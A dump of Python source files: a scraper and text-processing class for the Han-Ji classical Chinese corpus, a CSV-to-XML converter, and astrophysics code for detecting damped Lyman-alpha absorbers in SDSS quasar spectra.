self.flat_bodies[-1] = BeautifulSoup( self._pretty_html(soup), 'lxml' )
except bs4.FeatureNotFound as e:
logging.warning("lxml parser not found, try to use html5lib")
self.flat_bodies[-1] = BeautifulSoup( self._pretty_html(soup), "html5lib")
else:
self.flat_bodies[-1] = soup
else:
# append to flat bodies
if html_cutoff==True:
try:
self.flat_bodies.append( BeautifulSoup( self._pretty_html(soup), 'lxml'))
except bs4.FeatureNotFound as e:
logging.warning("lxml parser not found, try to use html5lib")
self.flat_bodies.append( BeautifulSoup( self._pretty_html(soup), "html5lib"))
else:
self.flat_bodies.append(soup)
# find the next page
next_page = soup.find('img', {'src' : '/ihp/snext.gif'})
if next_page != None:
url = next_page.find_parent()['href']
else:
logging.info('No further next page. Stop fetching.')
break
URL = urllib.parse.urljoin(BASE_URL, url)
time.sleep(random.randint(sleep_range[0], sleep_range[1]))
def extract_all(self):
'''do all extractions at one time'''
pass
def extract_paths(self):
'''extract paths from bookmark in self.flat_bodies list and append paths to self.paths'''
self.paths = []
for soup in self.flat_bodies:
# extract "gobookmark" class
path = soup.find('a', attrs={'class', 'gobookmark'}).text
self.paths.append(path)
def extract_meta(self):
'''extract meta data from self.paths.'''
pass
def extract_passages(self):
        '''extract passages from the Book. Users should define their own methods to organize the Book.'''
pass
def _sum_indent_and_padding(self, texts):
'''returns the sum of indents and paddings in the texts.'''
return [
sum([int(num[0]), int(num[1])])
for text in texts
for num in re.findall(r'text-indent:(.*?)em;padding-left:(.*?)em;', text['style'])
]
def _indent_and_padding(self, texts):
'''Return the indent and padding tuples of indents and paddings in the texts.'''
return [
(int(num[0]), int(num[1]))
for text in texts
for num in re.findall(r'text-indent:(.*?)em;padding-left:(.*?)em;', text['style'])
]
    def extract_rare_chars(self, driver_path, normalization=True):
        """Extract rare chars in every passage. Note that this function would run for a long time.
Args:
driver_path (str) : the path to your selenium driver
            normalization (bool) : whether or not to use the normalization API from Academia Sinica, default = True.
        Updated:
            self.flat_rare_chars (list) : {"(components of rare chars)" : ("(UNICODE)", "(UTF-8)"), ...}
        After running this function, run
>> self.write_rare_chars()
to write a json.
Therefore, you could just run
>> self.update_rare_char()
to update rare char in the next time without extracting rare char from web again.
"""
from rare_char_converter import rare_char_converter
self.flat_rare_chars = []
for body in self.flat_bodies:
while 1:
try:
time.sleep(random.randint(2, 5))
text = body.find("span", {"id":"fontstyle"}).text
rare_char_bag = rare_char_converter(text, driver_path, normalization=True)
self.flat_rare_chars.append(rare_char_bag)
break
except (TimeoutError, ConnectionResetError, urllib.error.URLError) as e:
logging.warning("{}, wait for 10 secs.".format(e))
time.sleep(10)
def write_rare_chars(self):
import json
with open("{}_rare_char.json".format(self.bookname), "w", encoding="utf-8") as file:
json.dump(self.flat_rare_chars, file)
def update_rare_chars(self):
"""Replace rare char based on `{bookname}_rare_char.json`"""
import json
try:
with open("{}_rare_char.json".format(self.bookname), "r", encoding="utf-8") as file:
self.flat_rare_chars = json.load(file)
flat_htmls = []
for soup,rare_char in zip(self.flat_bodies, self.flat_rare_chars):
html = str(soup)
for components,(UICODE, char) in rare_char.items():
html = re.sub(components, char, html)
try:
flat_htmls.append(BeautifulSoup(html, "lxml"))
except bs4.FeatureNotFound as e:
logging.warning("lxml parser not found, try to use html5lib")
flat_htmls.append(BeautifulSoup(html, "html5lib"))
self.flat_bodies = flat_htmls
except FileNotFoundError as e:
logging.error("""[Error] {}_rare_char.json does not exist
try to run these lines:
\t>> self.extract_rare_chars()
\t>> self.write_rare_chars()\n""".format(self.bookname))
def _regexf(self, char, num):
return r"[^、。,?!:;「」〔〕『』]{" + str(num) + "}" + char
def passage_generator(self):
'''iterate over every passage regardless the hierarchical structure'''
for passages in self.flat_passages:
for p in passages:
yield p
def char_word_counts(self, char, limits=(1, 4)):
'''
        Count the number of occurrences of phrases attached to a certain character
Args:
char (str): the character you want to set as the last character in the phrase.
limits (tuple): lower and upper limit for the characters before the `char`.
Yield:
collections.Counter object
'''
return Counter(list(self._word_generator(char, limits)))
def _word_generator(self, char, limits):
lower, upper = limits
for p in self.passage_generator():
for i in range(lower, upper):
for match in re.finditer(self._regexf(char, i), p):
yield match.group(0)
def strip_tag(self, name, attrs={}):
'''
Get rid of a tag (with certain attributes) from all pages in self.flat_bodies.
Args:
tag_name (str) : the tag you want to remove from the tree structure from all pages in self.flat_bodies
attrs (dict) : a dict contains all attribute names and their corresponding value
See also:
bs4's find_all https://www.crummy.com/software/BeautifulSoup/bs4/doc/#find-all
'''
for body in self.flat_bodies:
for sentence in body.find_all(name, attrs=attrs):
sentence.extract()
def strip_all_irrelevant_tags(self, connect_the_borken_lines=True, html_cutoff=True):
'''
remove 標註, page number, and page dividers from the tree structure
'''
if html_cutoff:
flat_bodies = []
for item in self.flat_bodies:
try:
flat_bodies.append(BeautifulSoup(self._pretty_html(item), "lxml"))
except bs4.FeatureNotFound as e:
logging.warning("lxml parser not found, try to use html5lib")
self.flat_bodies.append(BeautifulSoup(self._pretty_html(item), "html5lib"))
self.flat_bodies = flat_bodies
self.strip_tag("table", attrs={"class":"page"})
self.strip_tag("a", attrs={"href":"#"})
self.strip_tag("span", attrs={"style":"display:none;width:;height:;color:red;font-size:13px"})
self.strip_tag("center")
logging.info("Remove 標註, page number, and page dividers from the tree structure.")
if connect_the_borken_lines:
self.connect_the_borken_lines()
logging.info("Remove the new lines added by the page dividers, connect the paragraphs before and after the new lines.")
def connect_the_borken_lines(self):
'''
Remove the new lines added by the page dividers, connect the paragraphs before and after the new lines.
This method must be run after the self.strip_all_irrelevant_tags.
        TODO: fix the broken new lines in the quoted paragraphs
'''
# loop over body in flat_bodies:
for i,item in enumerate(self.flat_bodies):
# the item here is a bs4 object, so we need to convert it to a string
string_item = str(item)
# and then, substitute the regex pattern in the html source code in the item
updated_string_item = re.sub(
r'<\/div>([^\w]|\n)*?<div style="text-indent:0em;padding-left:0em;">',
r"",
string_item
)
# and then, we need to update the variable, item (with regex substituted), back into the flat_bodies list.
# Note that the updated_string_item has to be converted to bs4 object
self.flat_bodies[i] = BeautifulSoup(updated_string_item, "lxml")
def write_htmls(self, path='data/', html_cutoff=False):
'''writing all htmls in flat_bodies to the folder data/
Args:
path (str) : the path to the folder you want to write htmls files
html_cutoff (bool) : whether or not you want to cut off irrelevant contents in Han-Ji webpage
'''
try:
os.makedirs(path)
except OSError:
pass
for i,soup in enumerate(self.flat_bodies):
filename = os.path.join(path, '{}_{}.html'.format(
self.bookname, str(i).zfill(4)))
with open(filename, 'w', encoding='utf-8') as file:
if html_cutoff==True:
file.write( self._pretty_html(soup) )
else:
file.write(str(soup))
def load_htmls(self, path='data/', html_cutoff=False):
'''loading all files with filename = "bookname_*.html" in path data/
'''
self.flat_bodies = []
i = 0
while 1:
filename = os.path.join(path, '{}_{}.html'.format(
self.bookname, str(i).zfill(4)))
if os.path.isfile(filename):
with open(filename, 'r', encoding='utf-8') as file:
file_read = file.read()
try:
soup = BeautifulSoup(file_read, 'lxml')
if html_cutoff==True:
soup = BeautifulSoup( self._pretty_html(soup), "lxml" )
except bs4.FeatureNotFound as e:
logging.warning("lxml parser not found, try to use html5lib")
soup = BeautifulSoup(file_read, "html5lib")
if html_cutoff==True:
soup = BeautifulSoup( self._pretty_html(soup), "html5lib" )
self.flat_bodies.append( soup )
else:
logging.info("Stop at loading {}.".format(filename))
break
i += 1
logging.info("Total length of the data is {}.".format(len(self.flat_bodies)))
```
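A short usage sketch of the class above, from scraping to extraction; the book name, start URL and output folder are placeholders, and the `extract_meta`/`extract_passages` steps are left to a subclass as the docstring notes.
```python
# sketch: scraping a Han-Ji book and caching the pages locally
from Book import Book

book = Book(bookname="wenxuan", date="2018-01-01", creator="editor")

# placeholder for the first page of a book in the Han-Ji interface
start_url = "http://hanchi.ihp.sinica.edu.tw/ihpc/..."
book.fetch_data(start_url, pages_limit=5, print_bookmark=True, html_cutoff=True)

book.write_htmls(path="data/wenxuan/")   # cache the raw pages on disk
book.load_htmls(path="data/wenxuan/")    # ...or reload them in a later session
book.strip_all_irrelevant_tags()         # drop page dividers, 標註, page numbers
book.extract_paths()                     # fill book.paths from the bookmarks
print(len(book), book.paths[:3])
```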
#### File: DigitalHumanities/Han-Ji/HanJi_csv2xml.py
```python
import re
import pandas as pd
import argparse
from lxml import etree
def HanJi_csv2xml(df_head, df_passage):
# construct root element
root = etree.Element("lg", type="poem")
# construct header and author
author = etree.SubElement(root, "author")
author.text = "".join([a for a in df_head.author if type(a) == str])
head = etree.SubElement(root, "head")
for header, comment in zip(df_head.passage, df_head.comment):
# add a child element, head, for our XML
child_head = etree.SubElement(head, "l")
child_head.text = header.replace("\u3000", "")
# add a child element, comment in head, for our XML
if type(comment) == str:
child_head_comment = etree.SubElement(child_head, "comment")
child_head_comment.text = comment
# construct main text
for passage, comment in zip(df_passage.passage, df_passage.comment):
# add a child element, passage, for our XML
child_passage = etree.SubElement(root, "l")
child_passage.text = passage
# add a child element, comment, for our XML
child_child_comment = etree.SubElement(child_passage, "comment")
child_child_comment.text = comment if type(comment) == str else ""
return root
def main(args):
filename_passage = args.filename_passage
    # use re to build the matching head and xml filenames from the passage filename
filename_head = re.sub(r"_(.*?)_", r'_Head_', filename_passage)
filename_XML = re.sub(r".csv", r'.xml', filename_passage)
# loading DataFrames
df_passage = pd.read_csv(filename_passage)
df_head = pd.read_csv(filename_head)
# create etree elemets from csv2xml function
root = HanJi_csv2xml(df_head, df_passage)
# writing xml file
with open(filename_XML, "w", encoding="utf-8") as file:
file.write(
etree.tostring(root, encoding="unicode", pretty_print=True),
)
if __name__ == "__main__":
# argument parser, building flags
parser = argparse.ArgumentParser()
parser.add_argument('--filename_passage', type=str,
help='The filename of passage for Han-ji csv you want to convert to xml.')
args = parser.parse_args()
main(args)
``` |
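A small sketch of the expected input shape: both CSVs carry `passage` and `comment` columns, and the head file additionally carries `author`. The toy rows below are made up; the function can also be called directly on in-memory DataFrames, bypassing the command-line entry point.
```python
# sketch: building the XML tree from two toy DataFrames
import pandas as pd
from lxml import etree
from HanJi_csv2xml import HanJi_csv2xml

nan = float("nan")
df_head = pd.DataFrame({
    "author": ["陶淵明", nan],
    "passage": ["飲酒\u3000其五", "序"],
    "comment": [nan, "小序"],
})
df_passage = pd.DataFrame({
    "passage": ["結廬在人境", "而無車馬喧"],
    "comment": [nan, "注"],
})

root = HanJi_csv2xml(df_head, df_passage)
print(etree.tostring(root, encoding="unicode", pretty_print=True))
```
From the shell the same conversion runs as `python HanJi_csv2xml.py --filename_passage <file>.csv`; the head filename is derived by swapping the text between the first pair of underscores in that name for `Head`, and the output XML reuses the passage filename with an `.xml` extension.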
{
"source": "jibanCat/gp_dla_detection_dr16q_public",
"score": 2
} |
#### File: gp_dla_detection_dr16q_public/CDDF_analysis/solene_dlas.py
```python
import numpy as np
from astropy.io import fits
def solene_eBOSS_cuts(z_qsos: int, zwarning: int, bal_prob: float) -> np.ndarray:
"""
DLA_CAT_SDSS_DR16.fits (Chabanier+21)
*************************************************************************************
Results of the DLA search using the CNN from Parks+18 on the 263,201 QSO spectra from
the SDSS-IV quasar catalog from DR16 (Lyke+20) with
(1) 2 <= Z_QSO <= 6
(2) Z_WARNING !=
SKY (0),
LITTLE_COVERAGE (1),
UNPLUGGED (7),
BAD_TARGET (8) or
NODATA (9).
(3) BAL_PROB = 0
"""
# 1) Z_QSO
ind = (2 <= z_qsos) & (z_qsos <= 6)
# converting decimal ZWARNING to binary
zwarning_b = [format(z, "b") for z in zwarning]
# 2) ZWARNING: filtering based on Solene's condition
solene_filter = [0, 1, 7, 8, 9]
ind_z = np.ones(z_qsos.shape, dtype=np.bool_)
for i,zw in enumerate(zwarning_b):
for b in solene_filter:
fiter_yes = bitget_string(zw, b)
if fiter_yes:
ind_z[i] = False
break
# 3) BAL prob
ind_bal = (bal_prob == 0)
ind = ind & ind_z & ind_bal
return ind
def bitget_string(z: str, bit: int):
"""
    get the bit value at position `bit` (counting from the right), assuming `z` is a binary string.
"""
if bit >= len(z):
return False
bit_str = z[::-1][bit]
return bool(int(bit_str))
``` |
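A short worked example of the cuts: ZWARNING is a decimal bit mask, `format(z, "b")` renders it as a binary string, and `bitget_string` reads one bit counting from the right. The values below are toy inputs; the import path assumes the snippet runs from the repository root.
```python
# sketch: exercising the eBOSS cuts on toy values
import numpy as np
from CDDF_analysis.solene_dlas import solene_eBOSS_cuts, bitget_string

assert bitget_string(format(128, "b"), 7)      # 2**7: the UNPLUGGED bit is set
assert not bitget_string(format(16, "b"), 7)   # bit 7 is not set in 2**4 = 16

z_qsos = np.array([2.5, 2.5, 1.5, 2.5])
zwarning = [0, 128, 0, 16]          # plain ints; only iteration is required
bal_prob = np.array([0.0, 0.0, 0.0, 0.0])

ind = solene_eBOSS_cuts(z_qsos, zwarning, bal_prob)
print(ind)  # -> [ True False False  True]: the UNPLUGGED row and z_qso < 2 row are rejected
```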
{
"source": "jibanCat/gpy_dla_detection",
"score": 3
} |
#### File: gpy_dla_detection/examples/download_spectra.py
```python
import os
import numpy as np
from gpy_dla_detection.read_spec import read_spec, retrieve_raw_spec
def download_ho_2020_spectrum(num_quasars: int = 5):
"""
Download first N spectra from Ho-Bird-Garnett (2020) catalogue.
"""
assert num_quasars <= 100
# first 100 from catalogue
plates = np.array([6173, 6177, 4354, 6498, 6177, 4216, 6182, 4296, 7134, 6877, 6177,
4277, 4415, 4216, 4216, 7167, 6177, 4354, 7144, 6177, 7147, 7144,
6511, 6511, 6151, 4216, 4535, 6182, 7034, 6177, 6151, 6498, 7147,
6182, 4354, 6177, 6177, 4354, 6879, 6151, 7144, 4354, 4277, 6879,
6498, 6182, 6879, 4535, 7167, 6879, 4535, 4216, 4216, 4415, 6182,
6511, 6207, 4216, 6177, 4296, 4277, 7034, 4277, 6152, 6172, 7033,
4216, 4277, 6498, 7033, 4415, 4535, 6877, 6170, 4296, 6498, 6513,
6177, 4535, 6151, 4216, 4296, 4296, 7147, 4535, 4296, 7167, 6172,
4535, 6172, 4216, 7147, 4296, 7167, 4216, 7147, 4296, 6177, 6879,
7034])
mjds = np.array([56238, 56268, 55810, 56565, 56268, 55477, 56190, 55499, 56566,
56544, 56268, 55506, 55831, 55477, 55477, 56604, 56268, 55810,
56564, 56268, 56574, 56564, 56540, 56540, 56265, 55477, 55860,
56190, 56564, 56268, 56265, 56565, 56574, 56190, 55810, 56268,
56268, 55810, 56539, 56265, 56564, 55810, 55506, 56539, 56565,
56190, 56539, 55860, 56604, 56539, 55860, 55477, 55477, 55831,
56190, 56540, 56239, 55477, 56268, 55499, 55506, 56564, 55506,
56164, 56269, 56565, 55477, 55506, 56565, 56565, 55831, 55860,
56544, 56240, 55499, 56565, 56543, 56268, 55860, 56265, 55477,
55499, 55499, 56574, 55860, 55499, 56604, 56269, 55860, 56269,
55477, 56574, 55499, 56604, 55477, 56574, 55499, 56268, 56539,
56564])
fiber_ids = np.array([528, 595, 646, 177, 608, 312, 652, 364, 594, 564, 648, 896, 554,
302, 292, 290, 384, 686, 752, 640, 860, 266, 92, 86, 88, 732,
680, 342, 358, 386, 936, 844, 171, 338, 702, 584, 393, 709, 439,
78, 221, 700, 872, 580, 838, 326, 436, 302, 259, 427, 361, 718,
276, 466, 642, 114, 134, 724, 360, 386, 862, 657, 106, 4, 643,
2, 290, 152, 157, 14, 580, 315, 440, 573, 390, 158, 892, 366,
316, 954, 280, 656, 630, 138, 734, 382, 796, 628, 304, 342, 756,
889, 398, 238, 248, 900, 392, 656, 405, 647])
for plate, mjd, fiber_id in zip(
plates[:num_quasars], mjds[:num_quasars], fiber_ids[:num_quasars]
):
filename = "spec-{}-{}-{}.fits".format(plate, mjd, str(fiber_id).zfill(4))
print(filename)
if not os.path.exists(filename):
retrieve_raw_spec(plate, mjd, fiber_id) # the spectrum at paper
```
#### File: gpy_dla_detection/gpy_dla_detection/bayesian_model_selection.py
```python
from typing import List, Tuple, Union
from itertools import chain
import numpy as np
from scipy.special import logsumexp
from .null_gp import NullGP
from .dla_gp import DLAGP
from .subdla_gp import SubDLAGP
class BayesModelSelect:
"""
Bayesian model selection:
p(M | D) = P(M) * P(D | M) / ∑_i( P(M_i) * P(D | M_i) )
which reads:
model posterior = model prior * model evidence
/ (sum of the model posteriors of all possible models)
:attr model_list: a List of models we want to compute in Bayesian model selection.
    :attr all_max_dlas: a List of integers indicating the number of DLAs to be computed
        for each model in the List. 0 for no DLA, which means NullGP; for max_dlas > 0,
        model evidences will be calculated from .dla_gp.DLAGP.log_model_evidences(max_dlas).
    :attr dla_model_ind: an integer indicating the index of the DLA model in the model_list. This
        means all other models within model_list will be considered to be non-DLA alternatives.
        Default is 2.
"""
def __init__(
self, all_max_dlas: List[int] = [0, 1, 4], dla_model_ind: int = 2,
):
# a list of models, all have a base class of NullGP
self.all_max_dlas = all_max_dlas
self.dla_model_ind = dla_model_ind
def model_selection(
self, model_list: List[Union[NullGP, SubDLAGP, DLAGP]], z_qso: float
) -> np.ndarray:
"""
Calculate the log model evidences and priors for each model
in the model_list.
Default assumption is [null model, subDLA model, DLA model].
And always assume the first model is null model and the last one is DLA model.
"""
        assert not isinstance(model_list[0], DLAGP)
assert isinstance(model_list[-1], DLAGP)
assert isinstance(model_list[-1], NullGP)
assert len(model_list) > self.dla_model_ind
log_posteriors = []
log_priors = []
log_likelihoods = []
# prepare the model priors first, so we can get the null model prior
for i, num_dlas in enumerate(self.all_max_dlas):
# skip null model prior
if num_dlas == 0:
log_priors.append([np.nan])
continue
# model priors
log_priors_dla = model_list[i].log_priors(z_qso, num_dlas)
log_priors.append(log_priors_dla)
# null model prior is (1 - other model priors)
log_priors = np.array(list(chain(*log_priors)))
log_priors[0] = np.log(1 - np.exp(logsumexp(log_priors[1:])))
# calculating model evidences
# [Prior] the indexing part of priors is tricky. Do the elementwise addition instead!
for i, num_dlas in enumerate(self.all_max_dlas):
# if this is null model
if num_dlas == 0:
# model evidence
log_likelihood_no_dla = model_list[i].log_model_evidence()
log_likelihoods.append([log_likelihood_no_dla])
# if this is for DLA model or subDLA model
else:
# model evidence
log_likelihoods_dla = model_list[i].log_model_evidences(num_dlas)
log_likelihoods.append(log_likelihoods_dla)
# flatten the nested list : this is due to each element
log_likelihoods = np.array(list(chain(*log_likelihoods)))
# [Prior] elementwise addition
log_posteriors = log_likelihoods + log_priors
# [Prior] make sure prior assignment was correct
assert np.abs((log_likelihoods[-1] + log_priors[-1]) - log_posteriors[-1]) < 1e-4
self.log_priors = log_priors
self.log_likelihoods = log_likelihoods
self.log_posteriors = log_posteriors
return log_posteriors
@property
def dla_model_posterior_ind(self):
"""
Find the ind for DLA model posteriors in the log_posteriors array.
Default is [no DLA, subDLA, 1 DLA, 2 DLA, 3 DLA, 4 DLA],
corresponding to all_max_dlas = [0, 1, 4].
"""
ind = np.zeros((self.log_posteriors.shape[0],), dtype=np.bool_)
ind[-self.all_max_dlas[self.dla_model_ind] :] = True
self._dla_model_posterior_ind = ind
return self._dla_model_posterior_ind
@property
def model_posteriors(self):
sum_log_posteriors = logsumexp(self.log_posteriors)
return np.exp(self.log_posteriors - sum_log_posteriors)
@property
def model_evidences(self):
sum_log_evidences = logsumexp(self.log_likelihoods)
return np.exp(self.log_likelihoods - sum_log_evidences)
@property
def model_priors(self):
sum_log_priors = logsumexp(self.log_priors)
return np.exp(self.log_priors - sum_log_priors)
@property
def p_dla(self):
model_posteriors = self.model_posteriors
self._p_dla = np.sum(model_posteriors[self.dla_model_posterior_ind])
return self._p_dla
@property
def p_no_dla(self):
return 1 - self.p_dla
```
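The posterior bookkeeping above is a normalisation in log space. A standalone sketch with toy numbers (not real evidences) of how `model_posteriors` and `p_dla` fall out of `log_posteriors` via `logsumexp`, assuming the default model order `[no DLA, subDLA, 1 DLA, ..., 4 DLAs]`.
```python
# sketch: normalising toy log posteriors the same way the properties above do
import numpy as np
from scipy.special import logsumexp

# order: [no DLA, subDLA, 1 DLA, 2 DLAs, 3 DLAs, 4 DLAs]  (all_max_dlas = [0, 1, 4])
log_posteriors = np.array([-1200.5, -1203.0, -1198.7, -1201.2, -1204.8, -1207.3])

model_posteriors = np.exp(log_posteriors - logsumexp(log_posteriors))
assert np.isclose(model_posteriors.sum(), 1.0)

# P(DLA | D) sums the posteriors of the 1..4 DLA models (the last four entries)
p_dla = model_posteriors[-4:].sum()
p_no_dla = 1 - p_dla
print(model_posteriors.round(3), p_dla.round(3))
```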
#### File: gpy_dla_detection/gpy_dla_detection/dla_samples.py
```python
import numpy as np
import h5py
from .set_parameters import Parameters
from .model_priors import PriorCatalog
class DLASamples:
"""
A class to generate and store the QMC samples for DLAs:
theta = (z_dla, logNHI) = (redshift of DLA, column density of DLA)
:attr offset_samples: used for z_dla samples
:attr log_nhi_samples: log_nhi samples
"""
def __init__(self, params: Parameters, prior: PriorCatalog):
self.params = params
self.prior = prior
# extract data-driven prior paramters
self.num_dla_samples = params.num_dla_samples
self.uniform_min_log_nhi = params.uniform_min_log_nhi
self.uniform_max_log_nhi = params.uniform_max_log_nhi
self.fit_min_log_nhi = params.fit_min_log_nhi
self.fit_max_log_nhi = params.fit_max_log_nhi
self.alpha = params.alpha
def log_nhi_prior(self):
NotImplementedError
def z_dla_prior(self):
NotImplementedError
@property
def offset_samples(self):
NotImplementedError
@property
def log_nhi_samples(self):
NotImplementedError
@property
def nhi_samples(self):
NotImplementedError
class DLASamplesMAT(DLASamples):
"""
Load DLA samples from .mat file, which is generated from
Roman's generate_dla_samples.m.
"""
def __init__(
self,
params: Parameters,
prior: PriorCatalog,
dla_samples_file: str = "dla_samples_a03.mat",
):
super().__init__(params, prior)
dla_samples = h5py.File(dla_samples_file, "r")
assert self.alpha == dla_samples["alpha"][0, 0]
assert self.uniform_min_log_nhi == dla_samples["uniform_min_log_nhi"][0, 0]
self._offset_samples = dla_samples["offset_samples"][:, 0]
self._log_nhi_samples = dla_samples["log_nhi_samples"][:, 0]
self._nhi_samples = dla_samples["nhi_samples"][:, 0]
@property
def offset_samples(self) -> np.ndarray:
return self._offset_samples
@property
def log_nhi_samples(self) -> np.ndarray:
return self._log_nhi_samples
@property
def nhi_samples(self) -> np.ndarray:
return self._nhi_samples
def sample_z_dlas(self, wavelengths: np.ndarray, z_qso: float) -> np.ndarray:
sample_z_dlas = (
self.params.min_z_dla(wavelengths, z_qso)
+ (
self.params.max_z_dla(wavelengths, z_qso)
- self.params.min_z_dla(wavelengths, z_qso)
)
* self._offset_samples
)
return sample_z_dlas
```
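`sample_z_dlas` is just a linear map of the fixed offset samples into the per-spectrum search window `[min_z_dla, max_z_dla]`. A small sketch with toy numbers, assuming only that the offsets lie in [0, 1]:
```python
# sketch: stretching offset samples in [0, 1] into the z_DLA search range
import numpy as np

min_z_dla, max_z_dla = 2.18, 3.05          # toy values for one spectrum
offset_samples = np.array([0.0, 0.25, 0.5, 0.75, 1.0])

sample_z_dlas = min_z_dla + (max_z_dla - min_z_dla) * offset_samples
print(sample_z_dlas)  # -> 2.18, 2.3975, 2.615, 2.8325, 3.05
```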
#### File: gpy_dla_detection/plottings/plot_raw_spectrum.py
```python
from typing import Optional
import os
import re
import numpy as np
from matplotlib import pyplot as plt
from ..read_spec import read_spec, read_spec_dr14q, file_loader, retrieve_raw_spec
from ..set_parameters import Parameters
def plot_raw_spectrum(filename: str, release: str = 'dr12q', z_qso: Optional[float] = None):
'''
Plot the raw spectrum, the spectrum before normalisation.
:param filename: filename of the fits file. Must follow the convention,
"spec-{:d}-{:d}-{:04d}.fits".format(plate, mjd, fiber_id)
:param release: either dr12q or dr14q
:param z_qso: if known, plot an sub-axis with rest-frame wavelengths.
'''
assert release in ("dr12q", "dr14q")
# must follow the filename rule to extract
plate, mjd, fiber_id = re.findall(
r"spec-([0-9]+)-([0-9]+)-([0-9]+).fits", filename,
)[0]
if not os.path.exists(filename):
retrieve_raw_spec(int(plate), int(mjd), int(fiber_id), release=release)
# to prevent some people might tempt to load fits file
# from other directories, here we re-specify the filename
print("[Warning] file {} not found, re-download the file.".format(filename))
filename = file_loader(int(plate), int(mjd), int(fiber_id))
# read fits file
if release == "dr12q":
wavelengths, flux, noise_variance, pixel_mask = read_spec(filename)
elif release == "dr14q":
wavelengths, flux, noise_variance, pixel_mask = read_spec_dr14q(filename)
else:
raise Exception("must choose between dr12q or dr14q!")
# plotting config
fig, ax = plt.subplots(figsize=(16, 5))
ax.plot(wavelengths, flux, lw=0.25, label=r"$y(\lambda_{obs})$")
ax.plot(wavelengths, noise_variance, lw=0.25, label=r"$\sigma^2(\lambda_{obs})$")
ax.set_xlabel(r" Observed Wavelength [$\AA$]")
ax.set_ylabel(r"Flux [$10^{-17}{erg}/s/{cm}^{2}/\AA$]")
ax.set_title(r"{}".format(filename))
ax.set_ylim( np.quantile(flux, 0.005), np.quantile(flux, 0.995) )
ax.legend()
# [z_qso] plot the rest-frame axis if z_qso known
if z_qso != None:
assert (0 < z_qso) and (z_qso < 99)
ax2 = ax.secondary_xaxis('top', functions=(
lambda x : Parameters.emitted_wavelengths(x, z_qso),
lambda x : Parameters.observed_wavelengths(x, z_qso)))
ax2.set_xlabel(r"Rest Wavelength [$\AA$]")
```
#### File: gpy_dla_detection/gpy_dla_detection/set_parameters.py
```python
import numpy as np
class Parameters:
# physical constants
lya_wavelength: float = 1215.6701 # Lyman alpha transition wavelength Å
lyb_wavelength: float = 1025.7223 # Lyman beta transition wavelength Å
lyman_limit: float = 911.7633 # Lyman limit wavelength Å
speed_of_light: float = 299792458.0 # speed of light m s⁻¹
def __init__(
self,
# file loading parameters
loading_min_lambda: float = 910.0, # range of rest wavelengths to load Å
loading_max_lambda: float = 1217.0,
# preprocessing parameters
z_qso_cut: float = 2.15, # filter out QSOs with z less than this threshold
min_num_pixels: int = 200, # minimum number of non-masked pixels
# normalization parameters
normalization_min_lambda: float = 1310.0, # range of rest wavelengths to use Å
normalization_max_lambda: float = 1325.0, # for flux normalization
# null model parameters
min_lambda: float = 911.75, # range of rest wavelengths to Å
max_lambda: float = 1215.75, # model
dlambda: float = 0.25, # separation of wavelength grid Å
k: int = 20, # rank of non-diagonal contribution
max_noise_variance: float = 3.0
** 2, # maximum pixel noise allowed during model training
# optimization parameters
initial_c_0: float = 0.1, # initial guess for c₀
initial_tau_0: float = 0.0023, # initial guess for τ₀
initial_beta: float = 3.65, # initial guess for β
minFunc_options: dict = { # optimization options for model fitting
"MaxIter": 2000,
"MaxFunEvals": 4000,
},
# DLA model parameters: parameter samples
num_dla_samples: int = 10000, # number of parameter samples
alpha: float = 0.97, # weight of KDE component in mixture
uniform_min_log_nhi: float = 20.0, # range of column density samples [cm⁻²]
uniform_max_log_nhi: float = 23.0, # from uniform distribution
fit_min_log_nhi: float = 20.0, # range of column density samples [cm⁻²]
fit_max_log_nhi: float = 22.0, # from fit to log PDF
# model prior parameters
prior_z_qso_increase: float = 30000.0, # use QSOs with z < (z_QSO + x) for prior
# instrumental broadening parameters
width: int = 3, # width of Gaussian broadening (# pixels)
pixel_spacing: float = 1e-4, # wavelength spacing of pixels in dex
# DLA model parameters: absorber range and model
num_lines: int = 3, # number of members of the Lyman series to use
max_z_cut: float = 3000.0, # max z_DLA = z_QSO - max_z_cut
min_z_cut: float = 3000.0, # min z_DLA = z_Ly∞ + min_z_cut
# Lyman-series array: for modelling the forests of Lyman series
num_forest_lines: int = 31,
):
self.loading_min_lambda = loading_min_lambda
self.loading_max_lambda = loading_max_lambda
self.z_qso_cut = z_qso_cut
self.min_num_pixels = min_num_pixels
self.normalization_min_lambda = normalization_min_lambda
self.normalization_max_lambda = normalization_max_lambda
self.min_lambda = min_lambda
self.max_lambda = max_lambda
self.dlambda = dlambda
self.k = k
self.max_noise_variance = max_noise_variance
self.initial_c_0 = initial_c_0
self.initial_tau_0 = initial_tau_0
self.initial_beta = initial_beta
self.minFunc_options = minFunc_options
self.num_dla_samples = num_dla_samples
self.alpha = alpha
self.uniform_min_log_nhi = uniform_min_log_nhi
self.uniform_max_log_nhi = uniform_max_log_nhi
self.fit_min_log_nhi = fit_min_log_nhi
self.fit_max_log_nhi = fit_max_log_nhi
self.prior_z_qso_increase = self.kms_to_z(prior_z_qso_increase)
self.width = width
self.pixel_spacing = pixel_spacing
self.num_lines = num_lines
self.max_z_cut = self.kms_to_z(max_z_cut)
self.min_z_cut = self.kms_to_z(min_z_cut)
self.num_forest_lines = num_forest_lines
@classmethod
def kms_to_z(cls, kms: float) -> float:
"""
converts relative velocity in km s^-1 to redshift difference
"""
return (kms * 1000) / cls.speed_of_light
@staticmethod
def emitted_wavelengths(observed_wavelengths: np.ndarray, z: float) -> np.ndarray:
"""
utility functions for redshifting
"""
return observed_wavelengths / (1 + z)
@staticmethod
def observed_wavelengths(emitted_wavelengths: np.ndarray, z: float) -> np.ndarray:
"""
utility functions for redshifting
"""
return emitted_wavelengths * (1 + z)
def max_z_dla(self, wavelengths: np.ndarray, z_qso: float) -> float:
"""
determines maximum z_DLA to search
We only consider z_dla within the modelling range.
"""
rest_wavelengths = self.emitted_wavelengths(wavelengths, z_qso)
ind = (rest_wavelengths >= self.min_lambda) & (
rest_wavelengths <= self.max_lambda
)
return (np.max(wavelengths[ind]) / self.lya_wavelength - 1) - self.max_z_cut
def min_z_dla(self, wavelengths: np.ndarray, z_qso: float) -> float:
"""
determines minimum z_DLA to search
We only consider z_dla within the modelling range.
"""
rest_wavelengths = self.emitted_wavelengths(wavelengths, z_qso)
ind = (rest_wavelengths >= self.min_lambda) & (
rest_wavelengths <= self.max_lambda
)
return np.max(
[
np.min(wavelengths[ind]) / self.lya_wavelength - 1,
self.observed_wavelengths(self.lyman_limit, z_qso) / self.lya_wavelength
- 1
+ self.min_z_cut,
]
)
def __repr__(self):
"""
print out the default pipeline parameters
"""
return str(self.__dict__)
```
